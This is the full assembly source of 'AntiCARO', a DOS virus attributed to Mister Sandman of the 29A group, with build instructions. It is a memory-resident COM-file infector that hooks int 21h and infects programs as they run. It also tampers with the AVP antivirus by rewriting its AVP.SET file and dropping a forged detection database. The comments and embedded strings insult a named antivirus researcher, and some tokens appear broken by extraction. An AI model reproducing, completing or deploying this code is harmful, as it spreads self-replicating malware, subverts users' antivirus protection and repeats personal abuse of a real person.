2022-08-21 09:07:57 +00:00
; AntiCARO <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD>
; As i don't agree with CARO and with the way the name viruses, and spe-
; cially the way they *misnamed* VLAD's Bizatch, i decided to write this
; virus... just to protest against the biggest dickhead under the sun,
; Vesselin Bonchev, the virus-baptizer who does whatever he wants making
; abuse of his 'power' in that fucking sect named CARO.
; And as i know that, albeit he works at Frisk, his favourite AV is AVP,
; i just took the decission to write this baby, which will modify AVP so
; it will detect Bizatch as 'Bizatch_:P' and not as Boza.
; The virus is lame as hell (but i swear i wasn't able to reach Ratboy's
; or YAM's coding skills)... i only developed its originality. Anyway,
; it's interesting to see how does it modify AVP:
; It looks for AVP.SET in the current directory it's being loaded from.
; If it finds that file, it will insert a new viral database in the se-
; cond field, and later it will drop that new database, which contains
; the data needed for detecting Bizatch from AVP (have a look at the co-
; de, which is found at the end of this virus).
; As this new viral database has been loaded before the rest of the
; other databases (except of KERNEL.AVB, which must be always loaded in
; the first place), it will be the first one containing Bizatch's search
; strings, so it will be the fortunate participant to show the name of
; the virus it has detected :)
; About the virus itself, as i told before, it's a lame TSR COM infec-
; tor which hits files on execution (4b00h) and uses SFTs for performing
; the file infection.
; This virus is dedicated to my friends Quantum and Qark (ex VLAD) for
; obvious reasons and to Tcp/29A because of his help on its writing.
; Compiling instructions:
; tasm /m anticaro.asm
; tlink anticaro.obj
; exe2bin anticaro.exe anticaro.com
anticaro seg ment byte public
assume cs : anticaro , ds : anticaro
org 0
anticaro_start label byte
anticaro_size equ anticaro_end - anticaro_start
entry_point: call delta_offset
delta_offset: pop bp ; Get <20> -offset
sub bp , offset delta_offset ; for l8r use
mov ax , 3d02h ; Try to open AVP.SET
lea dx ,[ bp + avp_set ] ; if it's found in the
int 21h ; current directory
jc mem_res_check
xchg bx , ax
mov ah , 3fh ; Read the whole file
mov cx , 29Ah ;-)
lea dx ,[ bp + anticaro_end ]
int 21h
push ax
mov ax , 4200h ; Lseek to the second
xor cx , cx ; line (first must
mov dx , 0ch ; be always KERNEL.AVB)
int 21h
mov ah , 40h ; Truncate file from
xor cx , cx ; current offset
int 21h
mov ah , 40h ; Write our viral
mov cx , 0dh ; database name
lea dx ,[ bp + bizatch_name ] ; (BIZATCH.AVB) as
int 21h ; second field
mov ah , 40h ; And write the rest
pop cx ; of the original
sub cx , 0ch ; AVP.SET we read b4
lea dx ,[ bp + anticaro_end + 0ch ] ; to our buffer
int 21h
mov ah , 3eh ; Close file
int 21h
mov ah , 3ch ; Create the new viral
xor cx , cx ; database (BIZATCH.AVB)
lea dx ,[ bp + bizatch_base ] ; which contains Bizatch's
int 21h ; detection data
xchg bx , ax
mov ah , 40h ; Write the database
mov cx , base_size ; contents in the new
lea dx ,[ bp + bizatch_avb ] ; created file
int 21h
mov ah , 3eh ; Close file
int 21h
mem_res_check: mov ax , 'CA' ; Check if we're already
mov bx , 'RO' ; memory resident
int 21h
cmp ax , 'SU' ; Coolio residency
cmp bx , 'X!' ; check... CARO SUX! :P
je nothing_to_do
install: mov ax , es
dec ax
mov ds , ax ; Program's MCB segment
xor di , di
cmp byte ptr ds :[ di ], 'Y' ; Is it a Z block?
jna nothing_to_do
sub word ptr ds :[ di + 3 ],(( anticaro_size / 10h ) + 2 )
sub word ptr ds :[ di + 12h ],(( anticaro_size / 10h ) + 2 )
add ax , word ptr ds :[ di + 3 ]
inc ax
mov ds , ax
mov byte ptr ds :[ di ], 'Z' ; Mark block as Z
mov word ptr ds :[ di + 1 ], 8 ; System memory
mov word ptr ds :[ di + 3 ],(( anticaro_size / 10h ) + 1 )
mov word ptr ds :[ di + 8 ], 4f44h ; Mark block as owned
mov word ptr ds :[ di + 0ah ], 0053h ; by DOS (44h-4fh-53h,0)
inc ax
push cs
pop ds
mov es , ax ; Copy virus to memory
mov cx , anticaro_size
lea si ,[ bp + anticaro_start ]
rep movsb
push ds
mov ds , cx
mov es , ax ; Save int 21h's
mov si , 21h * 4 ; original vector
lea di , old_int_21h + 1
mov word ptr [ si - 4 ], offset new_int_21h
mov word ptr [ si - 2 ], ax ; Set ours
pop ds
push ds ; CS=DS=ES
pop es
nothing_to_do: lea si ,[ bp + host_header ] ; Restore host's header
mov di , 100h ; and jump to cs:100h
push di ; for running it
copyright db 0dh , 0ah , '[AntiCARO, by Mister Sandman/29A]' , 0dh , 0ah
db 'Please note: the name of this virus is [AntiCARO] '
db 'written by Mister Sandman of 29A... but... dear '
db 'Bontchy... name it however *you* (and not CARO) want,'
db ' as usual; we just don' 't mind your childish '
db 'stupidity :)' , 0dh , 0ah
new_int_21h: cmp ax , 'CA' ; Residency check
jnz execution? ; Are they asking my
cmp bx , 'RO' ; opinion about CARO?
jnz execution?
mov ax , 'SU' ; Ok, CARO SUX! :P
mov bx , 'X!'
execution?: cmp ax , 4b00h ; This is the moment
je ch eck_name ; we were waiting for ;)''
old_int_21h: db 0eah ; jmp xxxx:xxxx
dw 0 , 0 ; Original int 21h
check_name: push ax bx cx dx ; Push all this shit
push si di ds es ; and clear direction
cld ; flag
mov ax , 3d00h ; Open the file is
int 21h ; about to be executed
xchg bx , ax
call get_sft ; Get its SFT
jc dont_infect ; Shit... outta here
push cs ; CS=DS
pop ds
mov ax , word ptr es :[ di + 28h ] ; Check extension
cmp ax , 'OC' ; There aren't too many
je ch eck_file ; 'COx' executables
; besides COMs, right? :)
dont_infect: pop es ds di si ; Pop out registers and
pop dx cx bx ax ; jmp to the original
jmp old_int_21h ; int 21h handler
check_file: xor al , al ; Clear and save file
xchg al , byte ptr es :[ di + 4 ] ; attributes
push ax
mov word ptr es :[ di + 2 ], 2 ; Set read/write mode
mov ah , 3fh ; Read first four
mov cx , 4 ; bytes to our buffer
lea dx , host_header
int 21h
mov ax , word ptr host_header ; First word in AX
add al , ah ; M+Z or Z+M=0a7h :)
cmp al , 0a7h ; So is it an EXE file?
je cl ose_file ; Fuck it
cmp byte ptr host_header + 3 , 90h ; Check file for any
je cl ose_file ; previous infection
mov ax , word ptr es :[ di + 11h ] ; Check file length
cmp ax , 0faebh ; > 64235?
ja cl ose_file
push ax ; Save length
sub ax , 3 ; Make the initial
mov word ptr new_header + 1 , ax ; jmp to our code
mov word ptr es :[ di + 15h ], 0 ; Lseek to the start
mov ah , 40h ; Write in our cooler
mov cx , 4 ; header :)
lea dx , new_header
int 21h
pop ax ; Lseek to the end
mov word ptr es :[ di + 15h ], ax ; of the file
mov ah , 40h ; Append our code
mov cx , anticaro_size ; Huh? where's the
lea dx , anticaro_start ; call to the poly
int 21h ; engine? :)
close_file: mov ah , 3eh ; Close our victim
int 21h
pop ax ; Restore attributes
mov byte ptr es :[ di + 4 ], al ; Pop shit and jump
jmp dont_infect ; to the original int 21h
get_sft: push ax bx
mov ax , 1220h ; Get job file table
int 2fh ; in ES:DI (DOS 3+)
jc bad_sft
xor bx , bx ; Get the address of
mov ax , 1216h ; the specific SFT for
mov bl , byte ptr es :[ di ] ; our handle
int 2fh
bad_sft: pop bx ax ; Pop registers and
ret ; return to the code
host_header db 0cdh , 20h , 90h , 90h ; Host's header
new_header db 0e9h , ? , ? , 90h ; New header buffer
avp_set db 'avp.set' , 0 ; Can't you guess it? :)
bizatch_name db 'BIZATCH.AVB' , 0dh , 0ah ; Our database field
bizatch_base db 'bizatch.avb' , 0 ; Viral database name
; The hex dump below is the AVP full-compatible viral database which con-
; tains the necessary data for detecting Bizatch. This was done by compi-
; ling the 'belower' code, linking it to a new AVPRO record, and filling
; out some of this record's data fields. These are the steps:
; - Compile the source below this hex dump: tasm /m /ml /q biz_dec.asm.
; - Execute AVP's AVPRO.EXE.
; - Edit a new viral dabase (Alt-E, F3, and then type 'bizatch.avb').
; - Insert a file record in it (Alt-I, and then select 'File virus').
; - Fill the form as follows:
; <20> Name: Bizatch_:P Type [ ] COM <20>
; <20> Comment: Fuck you, Bontchy [X] EXE <20>
; <20> [ ] SYS <20>
; <20> Area 1 Header [ ] WIN <20>
; <20> Offset 0000 <20>
; <20> Length 00 Method Delete <20>
; <20> Area 2 Page_C Area Header <20>
; <20> Offset 0000 From +0000 <20>
; <20> Length 0a Length +0000 <20>
; <20> To +0000 <20>
; > <20> Link <20> +0000 <20>
; <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> Cut 0000 <20>
; > <20> Sum <20> 00000000 <20>
; <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> 00000000 <20>
; <20> <20>
; <20> Ok <20> Cancel <20> <20>
; - Link biz_dec.obj (Alt-L, and then select it).
; - Type in Bizatch's entry point for calculating its sum (Alt-S, don't
; select any file, and type in 'e8 00 00 00 00 5d 8b c5 2d 05' in the
; dump gap AVPRO will show you.
; - Save the new record and the new viral database.
; As you see, this is quite tedious to do, and that's why i included di-
; rectly the hex dump of the result of all these steps, which seems to me
; a bit more easy for you :)
; So skip the hex dump and have a look at biz_dec.asm's code, which is the
; really important thing of this virus.
base_start label byte
base_size equ base_end - base_start - 3
bizatch_avb db 2dh , 56h , 0c2h , 00h , 00h , 00h , 00h , 01h , 0cch , 07h , 04h
db 0bh , 0cch , 07h , 10h , 0bh , 00h , 00h , 01h , 00h , 00h , 00h , 00h
db 00h , 0dh , 0ah , 41h , 6eh , 74h , 69h , 76h , 69h , 72h , 61h , 6ch
db 20h , 54h , 6fh , 6fh , 6ch , 4bh , 69h , 74h , 20h , 50h , 72h , 6fh
db 0dh , 0ah , 20h , 62h , 79h , 20h , 45h , 75h , 67h , 65h , 6eh , 65h
db 20h , 4bh , 61h , 73h , 70h , 65h , 72h , 73h , 6bh , 79h , 20h , 0dh
db 0ah , 28h , 63h , 29h , 4bh , 41h , 4dh , 49h , 20h , 43h , 6fh , 72h
db 70h , 2eh , 2ch , 20h , 52h , 75h , 73h , 73h , 69h , 61h , 20h , 31h
db 39h , 39h , 32h , 2dh , 31h , 39h , 39h , 35h , 2eh , 0dh , 0ah , 50h
db 72h , 6fh , 67h , 72h , 61h , 6dh , 6dh , 65h , 72h , 73h , 3ah , 0dh
db 0ah , 41h , 6ch , 65h , 78h , 65h , 79h , 20h , 4eh , 2eh , 20h , 64h
db 65h , 20h , 4dh , 6fh , 6eh , 74h , 20h , 64h , 65h , 20h , 52h , 69h
db 71h , 75h , 65h , 2ch , 0dh , 0ah , 45h , 75h , 67h , 65h , 6eh , 65h
db 20h , 56h , 2eh , 20h , 4bh , 61h , 73h , 70h , 65h , 72h , 73h , 6bh
db 79h , 2ch , 0dh , 0ah , 56h , 61h , 64h , 69h , 6dh , 20h , 56h , 2eh
db 20h , 42h , 6fh , 67h , 64h , 61h , 6eh , 6fh , 76h , 2eh , 0dh , 0ah
db 0dh , 0ah , 00h , 0dh , 0ah , 38h , 00h , 00h , 00h , 10h , 00h , 42h
db 69h , 7ah , 61h , 74h , 63h , 68h , 5fh , 3ah , 50h , 00h , 00h , 00h
db 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 03h
db 00h , 00h , 0ah , 0fh , 0feh , 0ffh , 0ffh , 01h , 00h , 00h , 00h , 00h
db 00h , 00h , 00h , 0ch , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h , 00h
db 00h , 00h , 00h , 00h , 0dh , 01h , 12h , 00h , 00h , 00h , 46h , 75h , 63h
db 6bh , 20h , 79h , 6fh , 75h , 2ch , 20h , 42h , 6fh , 6eh , 74h , 63h , 68h
db 79h , 00h , 0dh , 02h , 01h , 01h , 00h , 00h , 98h , 07h , 00h , 28h , 86h
db 00h , 02h , 03h , 01h , 0adh , 8ch , 21h , 00h , 07h , 5fh , 50h , 61h
db 67h , 65h , 5fh , 43h , 00h , 07h , 5fh , 48h , 65h , 61h , 64h , 65h
db 72h , 00h , 05h , 5fh , 53h , 65h , 65h , 6bh , 00h , 05h , 5fh , 52h
db 65h , 61h , 64h , 00h , 53h , 90h , 0eh , 00h , 00h , 01h , 07h , 5fh
db 64h , 65h , 63h , 6fh , 64h , 65h , 00h , 00h , 00h , 97h , 0a0h , 8ah
db 00h , 01h , 00h , 00h , 1eh , 55h , 0bdh , 00h , 00h , 8eh , 0ddh , 0c4h
db 3eh , 00h , 00h , 26h , 8bh , 6dh , 3ch , 33h , 0c0h , 50h , 55h , 9ah
db 00h , 00h , 00h , 00h , 58h , 58h , 0c4h , 3eh , 00h , 00h , 0b8h , 0f8h
db 00h , 50h , 06h , 57h , 9ah , 00h , 00h , 00h , 00h , 83h , 0c4h , 06h
db 0c4h , 3eh , 00h , 00h , 26h , 81h , 3dh , 50h , 45h , 75h , 29h , 26h
db 8bh , 4dh , 06h , 51h , 0b8h , 28h , 00h , 50h , 06h , 57h , 9ah , 00h
db 00h , 00h , 00h , 83h , 0c4h , 06h , 59h , 0c4h , 3eh , 00h , 00h , 26h
db 81h , 3dh , 76h , 6ch , 75h , 08h , 26h , 81h , 7dh , 02h , 61h , 64h
db 74h , 07h , 0e2h , 0dbh , 33h , 0c0h , 5dh , 1fh , 0cbh , 26h , 0c4h
db 7dh , 14h , 06h , 57h , 9ah , 00h , 00h , 00h , 00h , 58h , 58h , 0c4h
db 3eh , 00h , 00h , 0b8h , 0ah , 00h , 50h , 06h , 57h , 9ah , 00h , 00h
db 00h , 00h , 83h , 0c4h , 06h , 0ebh , 0dah , 9ah , 9ch , 2dh , 00h
db 0c8h , 03h , 56h , 02h , 0c4h , 09h , 56h , 02h , 0cch , 14h , 56h
db 03h , 0c4h , 1ch , 56h , 01h , 0cch , 25h , 56h , 04h , 0c4h , 2eh
db 56h , 01h , 0cch , 43h , 56h , 04h , 0c4h , 4dh , 56h , 01h , 0cch
db 6ch , 56h , 03h , 0c4h , 74h , 56h , 01h , 0cch , 7dh , 56h , 04h , 57h
db 8ah , 02h , 00h , 00h , 74h
base_end label byte
; biz_dec segment byte public 'code'
; assume cs:biz_dec;ds:biz_dec;es:biz_dec;ss:biz_dec
; _decode proc far
; push ds bp
; mov bp,seg _Header ; Get AVP's data segment
; mov ds,bp
; les di,_Header ; Get pointer to header
; mov bp,word ptr es:[di+3ch] ; Get PE header offset
; xor ax,ax
; push ax bp
; call far ptr _Seek ; Lseek to PE header
; pop ax ax ; Remove 2 words from stack
; les di,_Page_C ; Destination=buffer
; mov ax,0f8h ; Size=f8h bytes
; push ax es di ; Read f8h bytes from
; call far ptr _Read ; the PE header
; add sp,6 ; Remove 3 words from stack
; les di,_Page_C ; The call changes ES
; cmp word ptr es:[di],'EP' ; Portable Executable?
; jne back_to_avp
; mov cx,word ptr es:[di+6] ; Objects number
; next_entry: push cx
; mov ax,28h ; Length of each
; push ax es di ; object table entry
; call far ptr _Read ; Read object
; add sp,6 ; Remove 3 words from stack
; pop cx
; les di,_Page_C ; Point to our buffer
; cmp word ptr es:[di],'lv' ; vl(ad) object?
; jne search_loop
; cmp word ptr es:[di],'da' ; (vl)ad object?
; je lseek_object ; Bingo! :)
; search_loop: loop next_entry ; Process next object
; back_to_avp: xor ax,ax ; R_CLEAN==0
; pop bp ds ; Return to AVP
; retf
; lseek_object: les di,dword ptr es:[di+14h] ; Lseek to the object
; push es di ; physical offset
; call far ptr _Seek
; pop ax ax
; mov ax,0ah ; Read ten bytes to
; les di,_Page_C ; our buffer (page C)
; push ax es di
; call far ptr _Read
; add sp,6 ; And now AVP will compare
; jmp back_to_avp ; those ten bytes with
; _decode endp ; Bizatch's search string
; biz_decode ends
; public _decode
; extrn _Page_C:dword ; External AVP's API
; extrn _Header:dword ; functions and buffers
; extrn _Seek:far ; (lseek, read, header,
; extrn _Read:far ; read buffer...)
; end
anticaro_end label byte
anticaro ends
end anticaro_start